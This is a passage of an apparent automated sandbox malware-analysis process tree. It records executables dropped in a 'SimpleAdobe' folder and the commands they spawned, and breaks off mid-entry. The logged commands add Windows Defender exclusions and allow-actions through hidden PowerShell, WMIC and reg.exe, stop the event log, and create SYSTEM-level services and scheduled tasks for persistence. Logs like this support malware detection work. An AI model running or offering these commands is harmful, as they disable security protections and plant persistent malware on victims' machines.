C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3200

C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
5⤵
- Executes dropped EXE
PID:1032

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
5⤵
- Creates scheduled task(s)
PID:3156

C:\Users\Admin\Documents\SimpleAdobe\EL0V9jsicQkwu5y5A3tv3gtV.exe
C:\Users\Admin\Documents\SimpleAdobe\EL0V9jsicQkwu5y5A3tv3gtV.exe
2⤵
- Executes dropped EXE
PID:2816

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2816 -s 780
3⤵
- Program crash
PID:2516

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2816 -s 780
3⤵
- Program crash
PID:1832

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2816 -s 780
3⤵
- Program crash
PID:1992

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2816 -s 800
3⤵
- Program crash
PID:5032

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2816 -s 1044
3⤵
- Program crash
PID:1412

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2816 -s 1076
3⤵
- Program crash
PID:1196

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "EL0V9jsicQkwu5y5A3tv3gtV.exe" /f & erase "C:\Users\Admin\Documents\SimpleAdobe\EL0V9jsicQkwu5y5A3tv3gtV.exe" & exit
3⤵
PID:1784

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "EL0V9jsicQkwu5y5A3tv3gtV.exe" /f
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5824

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2816 -s 1572
3⤵
- Program crash
PID:2476

C:\Users\Admin\Documents\SimpleAdobe\CzvCj0FEbiMieZehO5NAjU6Y.exe
C:\Users\Admin\Documents\SimpleAdobe\CzvCj0FEbiMieZehO5NAjU6Y.exe
2⤵
- Modifies firewall policy service
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops Chrome extension
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3948

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
3⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:404

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fff79eeab58,0x7fff79eeab68,0x7fff79eeab78
4⤵
PID:2944

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1504 --field-trial-handle=1800,i,17280366922604444268,7520917348462525573,131072 /prefetch:2
4⤵
PID:5808

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1972 --field-trial-handle=1800,i,17280366922604444268,7520917348462525573,131072 /prefetch:8
4⤵
PID:5900

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2020 --field-trial-handle=1800,i,17280366922604444268,7520917348462525573,131072 /prefetch:8
4⤵
PID:5916

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2996 --field-trial-handle=1800,i,17280366922604444268,7520917348462525573,131072 /prefetch:1
4⤵
PID:2368

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3004 --field-trial-handle=1800,i,17280366922604444268,7520917348462525573,131072 /prefetch:1
4⤵
PID:1520

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4152 --field-trial-handle=1800,i,17280366922604444268,7520917348462525573,131072 /prefetch:1
4⤵
PID:5360

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4416 --field-trial-handle=1800,i,17280366922604444268,7520917348462525573,131072 /prefetch:1
4⤵
PID:3636

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3860 --field-trial-handle=1800,i,17280366922604444268,7520917348462525573,131072 /prefetch:8
4⤵
PID:5892

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3376 --field-trial-handle=1800,i,17280366922604444268,7520917348462525573,131072 /prefetch:8
4⤵
PID:2492

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3692 --field-trial-handle=1800,i,17280366922604444268,7520917348462525573,131072 /prefetch:8
4⤵
PID:1720

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4932 --field-trial-handle=1800,i,17280366922604444268,7520917348462525573,131072 /prefetch:8
4⤵
PID:4976

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5136 --field-trial-handle=1800,i,17280366922604444268,7520917348462525573,131072 /prefetch:8
4⤵
PID:5792

C:\Users\Admin\Documents\SimpleAdobe\EVRLEFHpACwBC7LNv6ChLne3.exe
C:\Users\Admin\Documents\SimpleAdobe\EVRLEFHpACwBC7LNv6ChLne3.exe
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:1344

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1344 -s 2076
3⤵
- Program crash
PID:5220

C:\Users\Admin\Documents\SimpleAdobe\Kv2hzaDcjRGUD1nawK5WxXFL.exe
C:\Users\Admin\Documents\SimpleAdobe\Kv2hzaDcjRGUD1nawK5WxXFL.exe
2⤵
- Executes dropped EXE
PID:3920

C:\Users\Admin\AppData\Local\Temp\7zSE07D.tmp\Install.exe
.\Install.exe /wuNdidRg "525403" /S
3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Enumerates system info in registry
PID:4168

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
4⤵
PID:4024

C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
5⤵
PID:4608

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3964

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:1064

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bXvtwaJkKQEzfXjvnG" /SC once /ST 19:52:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\IvFVVHNigIyhAiWaa\EDHrMUSPJvyJNvL\ZGNIdNY.exe\" Mv /HPsite_idXyj 525403 /S" /V1 /F
4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:5492

C:\Users\Admin\Documents\SimpleAdobe\l0GYgdTIEqcOpBSBqDB_SP8p.exe
C:\Users\Admin\Documents\SimpleAdobe\l0GYgdTIEqcOpBSBqDB_SP8p.exe
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3492

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5724

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5732

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5740

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5748

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "OBGPQMHF"
3⤵
- Launches sc.exe
PID:5756

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "OBGPQMHF" binpath= "C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe" start= "auto"
3⤵
- Launches sc.exe
PID:5448

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
3⤵
- Launches sc.exe
PID:5796

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "OBGPQMHF"
3⤵
- Launches sc.exe
PID:5028

C:\Users\Admin\Documents\SimpleAdobe\QRRkU2L9KM3jIB30lgkiKr7E.exe
C:\Users\Admin\Documents\SimpleAdobe\QRRkU2L9KM3jIB30lgkiKr7E.exe
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2856

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:1700

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1700 -s 2104
4⤵
- Program crash
PID:764

C:\Users\Admin\Documents\SimpleAdobe\mJkh_vBPKYWlrKhfwjZe_fEy.exe
C:\Users\Admin\Documents\SimpleAdobe\mJkh_vBPKYWlrKhfwjZe_fEy.exe
2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- outlook_office_path
- outlook_win_path
PID:2104

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe" /tn "MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe HR" /sc HOURLY /rl HIGHEST
3⤵
- Creates scheduled task(s)
PID:1492

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe" /tn "MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe LG" /sc ONLOGON /rl HIGHEST
3⤵
- Creates scheduled task(s)
PID:3564

C:\Users\Admin\AppData\Local\Temp\heidiIBJsbpNoTUnc\v34VMN90gdbiJnmN2N9A.exe
"C:\Users\Admin\AppData\Local\Temp\heidiIBJsbpNoTUnc\v34VMN90gdbiJnmN2N9A.exe"
3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2188

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV1_5fc4ccc1a69cead8abaf9c75121d8fec\MSIUpdaterV1.exe" /tn "MSIUpdaterV1_5fc4ccc1a69cead8abaf9c75121d8fec HR" /sc HOURLY /rl HIGHEST
3⤵
- Creates scheduled task(s)
PID:2508

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV1_5fc4ccc1a69cead8abaf9c75121d8fec\MSIUpdaterV1.exe" /tn "MSIUpdaterV1_5fc4ccc1a69cead8abaf9c75121d8fec LG" /sc ONLOGON /rl HIGHEST
3⤵
- Creates scheduled task(s)
PID:3196

C:\Users\Admin\AppData\Local\Temp\heidiIBJsbpNoTUnc\iTYVFkMjmhiHGHjan9fR.exe
"C:\Users\Admin\AppData\Local\Temp\heidiIBJsbpNoTUnc\iTYVFkMjmhiHGHjan9fR.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4956

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
4⤵
PID:5192

C:\Users\Admin\Documents\SimpleAdobe\tps1VzfXq5Mcx5uJvDrHkokV.exe
C:\Users\Admin\Documents\SimpleAdobe\tps1VzfXq5Mcx5uJvDrHkokV.exe
2⤵
- Executes dropped EXE
PID:2204

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
3⤵
PID:4968

C:\Users\Admin\Documents\SimpleAdobe\tps1VzfXq5Mcx5uJvDrHkokV.exe
"C:\Users\Admin\Documents\SimpleAdobe\tps1VzfXq5Mcx5uJvDrHkokV.exe"
3⤵
- Executes dropped EXE
- Checks for VirtualBox DLLs, possible anti-VM trick
PID:5384

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2440

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:2600

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:752

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2384

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1220

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:3780

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2816 -ip 2816
1⤵
PID:4640

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2816 -ip 2816
1⤵
PID:1596

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 2816 -ip 2816
1⤵
PID:5112

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 1700 -ip 1700
1⤵
PID:3644

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2816 -ip 2816
1⤵
PID:2540

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2816 -ip 2816
1⤵
PID:2676

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2816 -ip 2816
1⤵
PID:2292

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2816 -ip 2816
1⤵
PID:5696

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2816 -ip 2816
1⤵
PID:2704

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 1344 -ip 1344
1⤵
PID:6128

C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe
C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:5752

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
2⤵
PID:5580

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
2⤵
PID:5564

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:1064

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
2⤵
PID:5452

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
2⤵
PID:6104

C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
2⤵
PID:1884

C:\Windows\system32\svchost.exe
svchost.exe
2⤵
PID:5888

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2816 -ip 2816
1⤵
PID:5256

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 1080 -ip 1080
1⤵
PID:5208

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
1⤵
PID:3352

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4832 -ip 4832
1⤵
PID:2800

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2124 -ip 2124
1⤵
PID:5280

C:\Users\Admin\AppData\Local\Temp\IvFVVHNigIyhAiWaa\EDHrMUSPJvyJNvL\ZGNIdNY.exe
C:\Users\Admin\AppData\Local\Temp\IvFVVHNigIyhAiWaa\EDHrMUSPJvyJNvL\ZGNIdNY.exe Mv /HPsite_idXyj 525403 /S
1⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:1664

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5436

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
3⤵
PID:5916

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
4⤵
PID:1520

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
3⤵
PID:5704

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
3⤵
PID:1948

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
3⤵
PID:4552

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
3⤵
PID:1536

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
3⤵
PID:5184

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
3⤵
PID:2460

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
3⤵
PID:4200

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
3⤵
PID:5752

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
3⤵
PID:4024

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
3⤵
PID:3180

C:\Windows\SysWOW64\reg.exe
